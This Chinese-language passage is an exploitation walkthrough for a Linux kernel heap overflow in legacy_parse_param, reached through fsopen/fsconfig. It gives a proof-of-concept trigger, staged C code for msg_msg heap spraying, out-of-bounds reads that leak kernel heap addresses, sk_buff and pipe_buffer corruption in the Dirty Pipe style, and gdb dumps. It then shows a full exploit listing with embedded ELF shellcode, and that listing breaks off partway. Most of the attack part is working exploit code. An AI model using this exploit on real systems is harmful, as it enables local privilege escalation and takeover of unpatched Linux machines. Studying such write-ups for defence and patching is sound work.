ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
if (!ctx->legacy_data)
return -ENOMEM;
}

ctx->legacy_data[size++] = ',';
len = strlen(param->key);
memcpy(ctx->legacy_data + size, param->key, len); /* ctx->legacy_data发生溢出 */
size += len;
if (param->type == fs_value_is_string) {
ctx->legacy_data[size++] = '=';
memcpy(ctx->legacy_data + size, param->string, param->size); /* ctx->legacy_data发生溢出 */
size += param->size;
}
ctx->legacy_data[size] = '\0';
ctx->data_size = size;
ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
return 0;
}
  • 如果 size + 2 的值大于 PAGE_SIZE 就会导致溢出检查失效,从而使 len 可以大于剩余未拷贝的数据长度,进而在 cxt->legacy_data 上发生溢出
  • 为了触发漏洞,size 必须大于 4094 但又不能超过 4096,因此 size 只能为 4095

漏洞 Poc 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#include "kernelpwn.h"

int fsopen(const char *fs_name, unsigned int flags){
return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd,
const char *key, const void *val, int aux){
return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

int main(int argc, char **argv, char **envp){
int fs_fd;
char* var = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
unshare(CLONE_NEWNS | CLONE_NEWUSER);

fs_fd = fsopen("ext4", 0);
if (fs_fd < 0) {
err_exit("FAILED to fsopen()!");
}

for (int i = 0; i < 255; i++) {
fsconfig(fs_fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
sleep(2);
fsconfig(fs_fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

return 0;
}

入侵思路

出现堆溢出的 slab 是 kmalloc-4k,可以使用自写管道完成提权,但这里使用 Dirty Pipe 的方法(直接修改它的 flags)

首先我们调用 fsopen 并准备好堆溢出:

1
2
3
4
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

然后大量分配如下的 msg:

  • 一个 0x1000 的 struct msg_msg
  • 一个 0x400 的 struct msg_msgseg

那样就有机会使 legacy_data - 0x1000,msg_msg - 0x1000,msg_msgseg - 0x400 物理连续

1
2
3
|page1-------|page2----|page3-----------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgsegB][...][...]
|0x1000------|0x1000---|0x400-------|0x400------|-- ... --|
  • 伙伴系统分配的伙伴页物理地址连续,但不能确定 msg_msgsegB 一定是 msg_msgseg 结构体

然后使用堆溢出来修改 msg_msg.m_ts,读取后续的 msg_msgsegB 并确定该区域为 msg_msgseg 结构体(否则就重新堆喷):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n"); /* 准备堆溢出(使后续调用的fsconfig触发堆溢出) */
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0); /* 触发堆溢出 */

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}

在触发堆溢出的地方断点,打印数据如下:

1
2
3
4
0xffffffff8121f18f <legacy_parse_param+527>    call   memcpy            <memcpy>
dest: 0xffff888004a0b001 ◂— 0xc0ffff888004978e
src: 0xffff888003707780 ◂— 0x3130303030303030 ('00000001')
n: 0x19
1
2
3
4
5
6
7
8
20:0100│ rdi-1 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0x0
21:01080xffff888004a0b008 —▸ 0xffff888004978ec0 —▸ 0xffff888004a0b000 —▸ 0xffff888004978e3d 0
22:01100xffff888004a0b010 ◂— 0x41 /* 'A' */
23:01180xffff888004a0b018 ◂— 0x13c8
24:01200xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:01280xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
26:01300xffff888004a0b030 ◂— 0x13371337
26:01380xffff888004a0b038 ◂— 0x5151515151515151 ('QQQQQQQQ')
1
2
3
4
5
6
20:0100│ rax-1 rdi-1 0xffff888004a0b000 ◂— 0x303030303030303d ('=0000000')
21:01080xffff888004a0b008 ◂— 0x3131313131313131 ('11111111')
22:01100xffff888004a0b010 ◂— 0x3232323232323232 ('22222222')
23:01180xffff888004a0b018 ◂— 0x17c8
24:01200xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:01280xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
  • 可以发现 msg_msg.m_ts 被扩大,使其可以向后溢出泄露地址

当我们确定 msg_msgsegB 为一个 msg_msgseg 结构体后,就可以将除了 msg_msgsegA 的所有 msg_msgseg 都释放掉,然后用 0x400 的 msg_msg 进行堆喷占位:

1
2
3
|page1-------|page2----|page3---------------------------|
[legacy_data][msg_msgA][msg_msgsegA][free slob][...][...]
|0x1000------|0x1000---|0x400-------|0x400----|-- ... --|
1
2
3
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
  • 这里假设命中 free slob 的 msg_msg 结构体为 msg_msgB

接着就可以泄露 msg_msgB 各个条目的信息了,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1(); /* msg_msgA的m_type已经被修改,因此不会释放msg_msgA和msg_msgsegA */

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

目前的堆布局如下:

1
2
3
4
5
6
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
||-(prev)->msg_msgC(地址泄露)
||-(next)->msg_msgD
0x400:msg_msgC->msg_msgB->msg_msgD
  • 通过 msg_msgB 已经泄露了 msg_msgC 的地址,这个 msg 后面会被拿来做 UAF

接下来就可以将 msg_msgD 以及其后的 msg_msg 都释放掉,重新申请一个 msg_msgX,这样X的地址就会写到 msg_msgB 的 next 指针处

  • 受限于场景,需要在 msg_msgX 中部署一个 fake msg_msg,让伪造 msg_msg->next 指向 msg_msgC(后续利用会需要)

接着再次使用 OOB read,就能知道 msg_msgX 的地址,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT); /* 释放msg_msgD以及其后的msg_msg */
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr; /* 填写msg_msgC(在上一步中泄露) */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
/* 申请msg_msgX(msg_msgX的地址将会写在msg_msgB->next处) */
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg); /* 泄露msg_msgX的地址,而这里的heap_buffer_addr记录的是fake msg_msg的地址 */
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

再次调用 fsopen 准备好堆溢出,这一次修改 m_list.next 使其指向之前部署的 fake msg_msg(而 fake msg_msg->next 则是指向已知地址的 msg_msgC)

接着,将 msg_msgB 从正常的 msg 队列中取出,再堆喷 sk_buff->data 占用 msg_msgB 的空间:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr; /* 修改next指针为fake msg_msg */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140); /* 利用sk_buff进行占位 */
}

尝试释放 fake msg_msg,就会得到一个 UAF slob:

1
2
3
4
5
6
7
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

最后再往 UAF slob 中堆喷 pipe_buffer,利用 sk_buff 修改 pipe_buffer->flag,之后的步骤就和 DirtyPipe 一样了(往 /bin/busybox 中写入 shellcode)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define MSG_A_RAW_SIZE (0x1400 - 0x8)
#define MSG_A_BUFF_SIZE (MSG_A_RAW_SIZE - sizeof(struct msg_msg))
#define MSG_B_RAW_SIZE (0x400)
#define MSG_B_BUFF_SIZE (MSG_B_RAW_SIZE - sizeof(struct msg_msg))
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
#define MSG_SIG (0x13371337)
#define NUM_PIPES (0x100)
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x80)

struct list_head {
uint64_t next;
uint64_t prev;
};

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
char mtext[0];
};

struct msg_msgseg {
uint64_t next;
};

struct typ_msg_a {
long mtype;
char mtext[MSG_A_BUFF_SIZE];
};

struct typ_msg_a_oob {
long mtype;
char mtext[MSG_A_BUFF_SIZE + 0x400];
};

struct typ_msg_b {
long mtype;
char mtext[MSG_B_BUFF_SIZE];
};

unsigned char elfcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, /* /root */ 0x2f, 0x72, 0x6f, 0x6f, 0x74, /* /flag */ 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};

int sockfd;
int sock_pairs[NUM_SOCKETS][2];
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg_a msg_a = {0};
struct typ_msg_a_oob msg_a_oob = {0};
struct typ_msg_b msg_b = {0};
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;
int dummy_pipe[NUM_PIPES][2];

void z() {
logd("waiting...\n");
getchar();
}

void die() {
exit(1);
}

void hexdump(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i) {
logd("%02X ", ((unsigned char *)data)[i]);
if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *)data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
logd(" ");
if ((i + 1) % 16 == 0) {
logd("| %s \n", ascii);
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
logd(" ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
logd(" ");
}
logd("| %s \n", ascii);
}
}
}
}

void init_unshare() {
int fd;
char buff[0x100];

// strace from `unshare -Ur xxx`
unshare(CLONE_NEWNS | CLONE_NEWUSER);

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", getuid());
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", getgid());
write(fd, buff, strlen(buff));
close(fd);
}

void init_msq() {
for (int i = 0; i < NUM_MSQIDS_1; i++) {
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (msqid_1[i] < 0) {
logd("[-] msgget() fail\n");
die();
}
}
for (int i = 0; i < NUM_MSQIDS_2; i++) {
msqid_2[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (msqid_2[i] < 0) {
logd("[-] msgget() fail\n");
die();
}
}
}

void init_sock() {
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
logd("[-] socket() fail\n");
die();
}

for (int i = 0; i < NUM_SOCKETS; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[i]) < 0) {
logd("[-] socketpair() fail\n");
die();
}
}
}

void clean_msq_1() {
for (int i = 0; i < NUM_MSQIDS_1; i++) {
msgrcv(msqid_1[i], &msg_a, sizeof(msg_a.mtext), MTYPE_A, IPC_NOWAIT);
}
}

void clean_msq_2() {
for (int i = 0; i < NUM_MSQIDS_2; i++) {
for (int j = 0; j < 0x10; j++) {
msgrcv(msqid_2[i], &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
}
}

void clean_pipe() {
for (int i = 0; i < NUM_PIPES; i++) {
char buffer[0x100];
read(dummy_pipe[i][0], buffer, 0x100);
close(dummy_pipe[i][0]);
close(dummy_pipe[i][1]);
}
}

void bind_cpu() {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
perror("sched_setaffinity");
die();
}
}

int call_fsopen() {
int fd = fsopen("ext4", 0);
if (fd < 0) {
perror("fsopen");
die();
}
return fd;
}

void spray_skbuff_data(void *ptr, size_t size) {
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (write(sock_pairs[i][0], ptr, size) < 0) {
logd("[-] write to sock pairs failed\n");
die();
}
}
}
}

void free_skbuff_data(void *ptr, size_t size) {
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
}
}
}

uint64_t exploit_step1(int fd) {
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0);

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}
if (list1_corrupted_msqid < 0) {
logd("[!] can't found corrupted msg_msg, and kernel may crash :(\n");
clean_msq_1();
return 1;
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1();

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
